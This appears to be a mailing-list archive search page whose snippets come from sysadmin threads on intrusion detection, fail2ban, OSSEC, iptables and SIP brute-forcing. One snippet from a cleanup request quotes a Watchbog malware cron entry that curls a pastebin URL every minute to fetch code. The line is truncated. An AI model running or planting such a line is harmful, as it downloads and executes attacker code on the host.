similar to: file2ban

Displaying 20 results from an estimated 1000 matches similar to: "file2ban"

2010 Oct 16
1
fraud advice (Also advice on using ipbanning)
When we designed our systems on asterisk we designed it to be multi-tenant. So we use customer prefixes on all extensions. This allows us to have multiple customers using the same extension pools. It also reduces the hack footprint as hackers must know the prefix for a customer to try and brute force things. All passwords use 8+ characters with alphanumeric and special characters. As I see
2010 Aug 10
5
Iptables questions
Hello, I have read and seen many options for additions to Iptables as a firewall and security system. All seem to react to logs and not to incoming packets (as far as I have seen). I am interested in doing a number of security ideas to the firewall, iptables, on my webserver. If you have a program you would suggest or believe iptables is the proper solution, please feel free to post that. Here
2009 Nov 25
1
Puppet custom functions and user permissions
Puppet custom functions and user permissions I am busy writing a custom function to automatically add OSSEC agents to an OSSEC server after installation. Unfortunately, it seems that puppetmasterd is not respecting the entries in /etc/group in linux. No matter how many other groups the puppet user has been added to in /etc/group, when puppetmasterd runs the custom function the effective/real user
2009 Nov 28
6
AIDE or OSSEC on CentOS 5.4 x86_64?
Starting with a fresh load and after I finish hardening the load following the Center for Internet Security (CIS) guidance, I'm wondering whether AIDE or OSSEC would be a better intrusion detection system. I installed AIDE and did a quick test of AIDE and after initializing the db and applying the recent cups update, I found that 1700+ files had changed. Those are a lot of changes to wade
2011 Jun 13
1
Unable to grep 5 mins logs
Hi Friends! I need to prepare a script which will grep logs from the current time to the previous 5 mins, that is, if the current time is Mon Jun 13 12:40:40 IST 2011 then all the logs between the interval Mon Jun 12:35 - 12:40 2011 should be grepped by the script and appended to another file. However, the below script is not able to grep the desired logs, so I need some help in preparing the script.
2007 Sep 26
4
Intrusion Detection Systems
Situation: We are providing hosting services. I've grown tired of the various kiddie scripts/dictionary attacks on various services. The latest has been against vsftpd, on systems that I can't easily control vs. putting strict limits on ssh. We simply have too many users entering from too many networks many with dynamic IP addresses. Enter.... thinking about LIDS or Log Based
2012 Aug 22
2
Hiera, OSSEC and per-node stuff?
Hi. I have an interesting use case. OSSEC is a security tool based on a server-client architecture. The server generates keys for agents, and every agent has a different key. Now I want to distribute these keys via puppet. I've come across hiera and installed it, and it works superbly, but how to store a per-node key in hiera? This is my idea: hiera.yaml: --- :hierarchy: -
2010 Aug 18
3
Playing with sipvicious ..
... using it as a tool and understanding what it does... So one part of its toolset identifies valid SIP accounts - and I was under the impression that alwaysauthreject=yes was supposed to stop this... However, it sends a request for a highly probably non-existent account, then sends requests for probably existing accounts and I guess compares the results - account not found vs. bad
2017 Nov 06
1
How to detect botnet user on the server ?
Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than
2017 Nov 06
2
How to detect botnet user on the server ?
Hello guys, What is the best way to identify a possible user using a botnet with php on the server? And if he is using GET commands for example on another server. Does apache log outbound connections? If it is using a file that is not malicious, ClamAV would not identify it. Thanks
2007 Aug 16
1
meaning and cause of kernel panic ??
Hello all. I have been running centos 4.5 final for some time without any problems. Been running great, until today. System was frozen and /var/log/messages showed: Aug 15 23:01:28 mydomain kernel: Unable to handle kernel NULL pointer dereference at virtual address 00000000 Aug 15 23:01:28 mydomain kernel: printing eip: Aug 15 23:01:28 mydomain kernel: c01b2de4 Aug 15 23:01:28 mydomain
2015 Jul 22
7
Keyboard Interactive Attack?
I read an article today about keyboard-interactive auth allowing brute-forcing. I'm afraid I have minimal understanding of what keyboard-interactive really does. What does it do, and should I have my clients set it to off in sshd_config? --- Scott Neugroschl | XYPRO Technology Corporation 4100 Guardian Street | Suite 100 | Simi Valley, CA 93063 | Phone 805 583-2874 | Fax 805 583-0124 |
2010 Mar 04
8
Intrusion Detection
Hello all, I have been exploring the various intrusion detection systems available for the Linux platform and was wondering which ones you all would recommend? I have used AIDE before and while it is extremely easy to set up, it does not support the ability to send alerts as files are changed (which allows one to be aware of an intrusion almost immediately). Thank you, Dan Burkland
2012 May 25
4
PCI/DSS compliance on CentOS
I have a client project to implement PCI/DSS compliance. The PCI/DSS auditor has stipulated that the web server, application middleware (tomcat), and the db server have to be on different systems. In addition the auditor has also stipulated that there be an NTP server, a "patch" server. The Host OS on all of the above nodes will be CentOS 6.2. Below is a list of things that would be
2013 Jun 20
2
init.d scripts not starting at boot
I have just deployed a new CentOS 6.4 image on AWS, and I'm having issues with init.d scripts not starting up. I've verified the following: 1) They work on their own after boot 2) They're set to run at runlevels 3, 4, and 5 via chkconfig 3) The system boots up in runlevel 3 (no GUI) 4) There are no lingering PID files around after boot 5) Permissions
2019 Nov 14
4
how to know when a system is compromised
How do you know when a Linux system has been compromised? Every day I watch our systems with all the typical tools, ps, top, who; I watch firewall / IPS logs; I have logwatch set up and mailing daily summaries to me, and I dive deeper into logs if something looks suspicious. What am I missing or not looking at that you security gurus are looking at? I subscribe to the centos and SANS
2018 Dec 15
7
CentOS 7.5 Linux box got infected with Watchbog malware
Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently I am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps, which are done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget
2007 Oct 04
2
Internet threat management package
... Looking for a recommendation for a commercial threat management package. ( Think antivirus / antispy / anti-rootkit -- all rolled into one engine ), similar to this product: http://usa.kaspersky.com/products_services/work-space-security.php, which currently only supports one kernel for FC6, and RHEL4, officially. Here's the background. Need to make a decision and investment for a
2011 Mar 03
3
log monitoring and reporting software
Hi folks, In the company where I work, we are implementing a security standard. A part of this is log monitoring and reporting software. There are a few requirements that the software must fulfil: - It must be capable of collecting logs from different devices (Linux machines, network equipment, ...). - It must be capable of sending alarms on security events. - It has to generate daily (weekly,
2010 Feb 10
3
saslauthd attack
I'm seeing a lot of activity over the last two days with what looks to be a kiddie script. Mostly trying to access several of our servers with the username anna. All failed... in fact I don't think we have a user anna on any of our servers. Meanwhile... I'm running Sendmail. This pertains to Centos 4 and 5 servers. I'm also running fail2ban on some and Ossec on others. So far,